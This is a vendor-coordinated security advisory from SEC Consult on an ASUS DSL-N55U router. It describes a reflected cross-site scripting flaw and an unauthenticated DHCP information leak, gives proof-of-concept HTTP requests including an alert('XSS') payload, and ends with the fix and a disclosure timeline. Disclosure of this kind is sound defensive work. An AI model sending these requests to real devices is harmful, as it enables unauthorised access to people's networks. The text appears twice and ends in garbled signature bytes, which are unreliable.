SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >=======================================================================title: XSS and information disclosure vulnerabilityproduct: ASUS DSL-N55U routervulnerable version: 3.0.0.4.376_2736fixed version: 3.0.0.4_380_3679CVE number: requestedimpact: Mediumhomepage: https://www.asus.com/found: 2016-04-12by: P. Morimoto (Office Bangkok)SEC Consult Vulnerability LabAn integrated part of SEC ConsultBangkok - Berlin - Frankfurt/Main - Montreal - MoscowSingapore - Vienna (HQ) - Vilnius - Zurichhttp://ift.tt/1mGHMNR=======================================================================Vendor description:-------------------"ASUS has long been at the forefront of this growth and while the companystarted life as a humble motherboard manufacturer with just a handful ofemployees, it is now the leading technology company in Taiwan with over12,500 employees worldwide. ASUS makes products in almost every area ofInformation Technology too, including PC components, peripherals,notebooks, tablets, servers and smartphones."Source: http://ift.tt/28K4VTVBusiness recommendation:------------------------SEC Consult recommends not to use this device until a thorough security reviewhas been performed by security professionals and all identified issues havebeen resolved.Vulnerability overview/description:-----------------------------------1. Reflected Cross-Site ScriptingThe vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.If the web path is longer than 50 characters, it will redirect a user tothe cloud_sync.asp page with the web path as a value of a GET parameter.Due to the lack of input validation, an attacker can insert malicious JavaScriptcode to be executed under a victim's browser context.No authentication is required.2. Remote DHCP Information DisclosureAn unauthenticated attacker can gain access to DHCP information includingthe hostname and private IP addresses of the local machines connected to therouter from the WAN IP address.Proof of concept:-----------------1. Reflected Cross-Site ScriptingHTTP Request:GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1Host: HTTP Response:HTTP/1.0 200 OKServer: httpdDate: Tue, 12 Apr 2016 09:04:48 GMTContent-Type: text/htmlConnection: close2. Remote DHCP Information DisclosureHTTP Request:GET /Nologin.asp HTTP/1.1Host: HTTP Response:HTTP/1.0 200 OkServer: httpd[...]var dhcpLeaseInfo = [['', ''],['',''],['', '']];;function initial(){[...]Vulnerable / tested versions:-----------------------------The following firmware has been tested which was the most recent versionat the time of discovery:- 3.0.0.4.376_2736 (2015/01/19 update)URL: http://ift.tt/28PK7GHVendor contact timeline:------------------------2016-06-02: Contacting vendor through privacy (at) asus (dot) com [email concealed] and netadmin (at) asus.com (dot) tw. [email concealed]2016-06-03: ASUS responds and establishes encrypted communication channel.2016-06-06: Sending PGP encrypted security advisory to ASUS.2016-06-20: Vulnerability is fixed in beta firmware.2016-06-24: Public release of the advisory.Solution:---------Upgrade to firmware version 3.0.0.4_380_3679 or later.Workaround:-----------No workaround available.Advisory URL:-------------http://ift.tt/1UwAo9B~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC ConsultBangkok - Berlin - Frankfurt/Main - Montreal - MoscowSingapore - Vienna (HQ) - Vilnius - ZurichAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. Itensures the continued knowledge gain of SEC Consult in the field of networkand application security to stay ahead of the attacker. The SEC ConsultVulnerability Lab supports high-quality penetration testing and the evaluationof new offensive and defensive technologies for our customers. Hence ourcustomers obtain the most current information about vulnerabilities and validrecommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application http://ift.tt/1X0nW5wInterested in improving your cyber security with the experts of SEC Consult?Contact our local offices http://ift.tt/1UwzJF7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: research at sec-consult dot comWeb: http://ift.tt/1mGHMNRBlog: http://ift.tt/1OrTVF9Twitter: https://twitter.com/sec_consultEOF Pichaya Morimoto / @20160? *?H?÷ ?0?10`?He0? *?H?÷ ?0?¯0?? à#Ë?S?anzTgk!0*?H?÷0o10 USE10UAddTrust AB1&0$UAddTrust External TTP Network1"0 UAddTrust External CA Root0141222000000Z200530104838Z0?10 UGB10UGreater Manchester10USalford10UCOMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0?"0*?H?÷?0???±ÚzSNpR¼V¦&·¸Ià?çQ«ñðZI£´?`¼zQB§y?¤"ßaN?Õv#ÓJ¶ ?n¥=Ùº»þ¡?©.CRC|¯2PȦOZéØÏ?%?{?è0dæ¤øV?ý*$3?¬Dåi?£FKÂ3Ôé@?°±¬?@¹µ?:?*S£Û= a8ÿß?õ¬I¾Ê÷s?:2«??:=F:WtaP¾Æ@?Ëäâ?¢!£?0?0U#0?½?z4´&÷úÄ&Tï½à$ËT0U?ak?ᢠªOìgñ£÷´?Áì0Uÿ?0Uÿ0ÿ0U%0++0U00U 0DU=0;09 7 5?3http://crl.usertrust.com/AddTrustExternalCARoot.crl05+)0'0%+0?http://ift.tt/28SgDYb*?H?÷?*n¬UÁ:«?ÅØíÍUóªka+À #?Åfjo±õ´µw^aß}þ³¤??üû[jrA¼ºÁXÕ&ÂêÕM?ûþ??ÏXã"c?Rø»6«}X¥Þ«;cåÚÕsïìàû{â£ÿðB#?ʶM>äK²¨-ÔØ»BKi?Û¦74è{à¥?Ê:Ç?O?4n?eÐ?»©ÜÊÊ6ÑôüÂd)5¯Ö±§qÒC±>?ì?2Sôv?Ê?4¹,ÊæJØ?Á?â?ûZBj#!éeÇõÕ»~ê?? bêÑ:,YÅ?3ò8?å¶ézyöJ&ú|?û?0?_0?G #äÆBýÖ=ªÑ?nKN.0*?H?÷0?10 UGB10UGreater Manchester10USalford10UCOMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0160301000000Z170301235959Z0?U10 UAT10U270010UNiederoesterreich10UWr. Neustadt10U Komarigasse 141.0,U%SEC Consult Unternehmensberatung GmbH1I0GU@Issued through SEC Consult Unternehmensberatung GmbH E-PKI Manag10UCorporate Secure Email1&0$USEC Consult Vulnerability Lab1'0% *?H?÷research (at) sec-consult (dot) com0 [email concealed]?"0*?H?÷?0??ª!å?J?ÿ̶à?d8Lþ5n.<À?î,ah%Âà»ÑRØDʵ?ü?HØÞ6k??»Äg|ĤYDÓÁ?õ?ƽ¿O(?0'ª][þÍÿ?¡Á?l¤K,i?±t?©?Ý?Ò?å×嬾êæu?gæ(ãÈ??Ä*%§ñ3ò]?«{ÄÕÊ??0?¹??¾®O_N?;ô¡0?<¡?=ü¢?¤ûÙ~R¹ºìÛð?Æ=ÈLÇßhwRuï ðÚf§ñ6ß7õøç??VÔåZ¹Y# p;?oÆ@3LÓ'?EÂ+Bâ??µÄ½³fÁ ?ýMÁ]Ãräþ£?à0?Ü0U#0??ak?ᢠªOìgñ£÷´?Áì0UÈ3~?¾á¼¤<"Ç©2²¦O0Uÿ 0Uÿ00U%0++0FU ?0=0;+²10+0)+http://ift.tt/28REvyN N?Lhttp://crl.comodoca.com/COMODOSHA256ClientAuthenticationandSecureEmailCA.crl0+?0?0X+0?Lhttp://crt.comodoca.com/COMODOSHA256ClientAuthenticationandSecureEmailCA.crt0$+0?http://ocsp.comodoca.com0#U0research (at) sec-consult (dot) com0 [email concealed]*?H?÷?RÑá?:??¡áìa?4ÙcC~Þ?w1»_´¤¶s?kõ¢»¿Ö;?·¦b?äÅhøÕ?!J+æ rK?Bå?Çÿ?!>?Ó6/?hTBwT?l¿¹ùÁ6¹0ß3gKß5¦ÐJ8?}¸ÛÔ%QN?lr#té?ÀhM¡P&'aì}Äãå£DÝ/ôV/èÃÜ?:?öQu' %FaU?iKÚÙ?]G°õ9,ÑÒ?Vr¦NGÆ?0iæNR£ÂæKÌëìû?Â5?|eÁ\`é#mn\ë?0J?4»£ Î?æSv¦¬}O"aÌc7¸¯®+ËzìÝ1?A0?=0°0?10 UGB10UGreater Manchester10USalford10UCOMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0`?He ?a0 *?H?÷1 *?H?÷0 *?H?÷1160624085837Z0/ *?H?÷1" xD?+?íp!P$+F¾"C_×?Hö7aÿ±zãØ0l *?H?÷1_0]0 `?He*0 `?He0*?H?÷0*?H?÷?0*?H?÷@0+0*?H?÷(0Á +?71³0°0?10 UGB10UGreater Manchester10USalford10UCOMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0Ã*?H?÷1³ °0?10 UGB10UGreater Manchester10USalford10UCOMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0*?H?÷?HV?a]%?ÆcÖ*?änZÆë¡Øg?C'§¥Þ)rBË?N?oBûå|ZÅkÓGE0ÑÇÖê?mIY0??ùÒ?Së^?ær?&óø;?ß6ýò!?Ú8þ?UÆ/\ãäsÏÜùw#bdÖE/Ñs,ÜÚ?±8~?ëÂ%ufipó¾pu[)~??~C1ìqXL?ÇÁê±,àëu?×?.Ô?3d<ñÏX4.ÒáB¼ýá÷®Nú «yÀDÁLåI3áµÍ???:}üÆsîQè]Þd(Ìñí??¶®4PK[ reply ]from SecurityFocus Vulnerabilities http://ift.tt/28REZ7O
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
=======================================================================
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
http://ift.tt/1mGHMNR
=======================================================================
Vendor description:
-------------------
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."
Source: http://ift.tt/28K4VTV
Business recommendation:
------------------------
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
-----------------------------------
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
No authentication is required.
2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.
Proof of concept:
-----------------
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['', ''],['',
''],['', '']];;
function initial(){
[...]
Vulnerable / tested versions:
-----------------------------
The following firmware has been tested which was the most recent version
at the time of discovery:
- 3.0.0.4.376_2736 (2015/01/19 update)
URL: http://ift.tt/28PK7GH
Vendor contact timeline:
------------------------
2016-06-02: Contacting vendor through privacy (at) asus (dot) com [email concealed] and netadmin (at) asus.com (dot) tw. [email concealed]
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.
Solution:
---------
Upgrade to firmware version 3.0.0.4_380_3679 or later.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
http://ift.tt/1UwAo9B
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application http://ift.tt/1X0nW5w
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices http://ift.tt/1UwzJF7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: http://ift.tt/1mGHMNR
Blog: http://ift.tt/1OrTVF9
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2016
0? *?H?÷
?0?10
`?He0? *?H?÷
?0?¯0?? à#Ë?S?anzTgk!0
*?H?÷
0o10 USE10U
AddTrust AB1&0$UAddTrust External TTP Network1"0 UAddTrust External CA Root0
141222000000Z
200530104838Z0?10 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0?"0
*?H?÷
?0?
??±
ÚzSNpR¼V¦&·¸Ià?çQ«ñðZI£´?`¼zQB§y?¤"ßaN?Õv#
ÓJ¶ ?n¥=Ùº»þ¡?©.CRC|¯2PȦOZéØÏ?%?{?è0dæ¤øV?ý*$3?¬Dåi?£FKÂ3Ôé@?°±¬?@¹
µ?:?*S£Û= a
8ÿß?õ¬I¾Ê÷s?:2«??:=F:WtaP¾Æ@?Ëäâ?¢!£?0?0U#0?½?z4´&÷
úÄ&Tï½à$ËT0U?ak?ᢠªOìgñ£÷´?Áì0Uÿ?0Uÿ0
ÿ0U%0++0U
00U 0DU=0;09 7 5?3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
+)0'0%+0?http://ift.tt/28SgDYb
*?H?÷
?*n¬UÁ:«?ÅØíÍUóªka+À #?Åfjo±õ´µw^aß}þ³¤??üû[jr
A¼ºÁXÕ&ÂêÕM?ûþ??ÏXã"c?Rø»6«}X¥Þ«;cåÚÕsïìàû{â£ÿðB#?ʶM>äK²¨-ÔØ»BKi
?Û¦74è{à¥?Ê:Ç?O?4n?eÐ?»©ÜÊÊ6ÑôüÂd)5¯Ö±§qÒC±>?ì?2Sôv?Ê?4¹,ÊæJØ?
Á?â?ûZBj#!éeÇõÕ»~ê?? bêÑ:,YÅ?3ò8?å¶ézyöJ&ú|?û?0?_0?G #äÆBýÖ=ªÑ?nKN.0
*?H?÷
0?10 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0
160301000000Z
170301235959Z0?U10 UAT1
0U270010UNiederoesterreich10UWr. Neustadt10U Komarigasse 141.0,U
%SEC Consult Unternehmensberatung GmbH1I0GU@Issued through SEC Consult Unternehmensberatung GmbH E-PKI Manag10UCorporate Secure Email1&0$USEC Consult Vulnerability Lab1'0% *?H?÷
research (at) sec-consult (dot) com0 [email concealed]?"0
*?H?÷
?0?
?ª!å?J?ÿ̶à?d8Lþ5n.<À?î,ah%Âà»ÑRØDʵ?ü?HØÞ6k??»Äg|ĤYDÓÁ?õ?ƽ
¿O(?0'ª][þÍÿ?¡Á?l¤K,i?±t?©?Ý?Ò?å×嬾êæu?gæ(ãÈ??Ä*%§ñ3ò]?«{ÄÕÊ?
?0?¹??¾®O_N?;ô¡0?<¡?=ü¢?¤ûÙ~R¹ºìÛð?Æ=ÈLÇßhwRuï ðÚf§ñ6ß7õø
ç??VÔåZ¹Y# p;?oÆ@3LÓ'?EÂ+Bâ??µÄ½³fÁ ?ýMÁ]Ãräþ£?à0?Ü0U#0??ak?ᢠªOìgñ£÷´?Áì0UÈ3~
?¾á¼¤<"Ç©2²¦O0Uÿ 0Uÿ00U%0++0FU ?0=0;+²10+0)+http://ift.tt/28REvyN
N?Lhttp://crl.comodoca.com/COMODOSHA256ClientAuthenticationandSecureEma
ilCA.crl0+?0?0X+0?Lhttp://crt.comodoca.com/COMODOS
HA256ClientAuthenticationandSecureEmailCA.crt0$+0?http://ocsp.c
omodoca.com0#U0research (at) sec-consult (dot) com0 [email concealed]
*?H?÷
?RÑá?:??¡áìa?4ÙcC~Þ?w1»_´¤¶s?kõ
¢»¿Ö;?·¦b?äÅhøÕ?!J+æ rK?Bå?Çÿ?!>?Ó6/?hTBwT?l¿¹ùÁ6¹0ß3gKß5¦ÐJ8
?}¸ÛÔ%QN?lr#té?ÀhM¡P&'aì}Äãå£DÝ/ôV/èÃÜ?:?öQu' %FaU?iKÚÙ?]G°õ9,ÑÒ?Vr¦NGÆ?0iæNR£ÂæKÌëìû?Â5?|eÁ\`é#mn\ë?0J?
4»£ Î?æSv¦¬}O"aÌc7¸¯®+ËzìÝ1?A0?=0°0?10 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
`?He ?a0 *?H?÷
1 *?H?÷
0 *?H?÷
1
160624085837Z0/ *?H?÷
1" x
D?+?íp!P$+F¾"C_×?Hö7aÿ±zãØ0l *?H?÷
1_0]0 `?He*0 `?He0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0Á +?71³0°0?10 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0Ã*?H?÷
1³ °0?10 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
*?H?÷
?HV?a]%?ÆcÖ*?änZÆë¡Øg?C'§¥Þ)r
BË?N?oBûå|ZÅkÓGE0ÑÇÖê?mIY0?
?ùÒ?Së^?ær?&óø;?ß6ýò!?Ú8þ?UÆ/\ãäsÏÜùw#bdÖE/Ñs,ÜÚ?±8~?ëÂ%ufipó¾pu[)~??~C1ìqXL?ÇÁê±,àë
u?×?.Ô?3d<ñÏX4.ÒáB¼ýá÷®Nú «yÀDÁLåI3áµÍ???:}üÆsîQè]Þd(Ìñí??¶®4PK
[ reply ]